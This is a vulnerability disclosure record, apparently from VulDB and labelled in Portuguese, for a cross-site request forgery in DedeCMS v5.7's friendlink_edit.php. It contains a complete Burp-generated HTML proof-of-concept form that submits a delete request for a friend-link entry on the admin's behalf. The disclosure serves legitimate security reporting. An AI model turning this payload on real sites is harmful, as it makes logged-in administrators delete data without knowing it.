| Título | github DedeCMS v5.7 CSRF |
|---|
| Descrição | DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /src/dede/friendlink_edit.php
Poc:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/src/dede/friendlink_edit.php">
<input type="hidden" name="id" value="9" />
<input type="hidden" name="dopost" value="delete" />
<input type="submit" value="Submit request" />
</form>
</body>
</html> |
|---|
| Fonte | ⚠️ https://github.com/E1CHO/demo/blob/main/27.pdf |
|---|
| Utilizador | SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936) |
|---|
| Submissão | 14/03/2024 10h28 (há 2 anos) |
|---|
| Moderação | 22/03/2024 11h37 (8 days later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 257708 [DedeCMS 5.7 friendlink_edit.php ID Falsificação de Pedido entre Sites] |
|---|
| Pontos | 20 |
|---|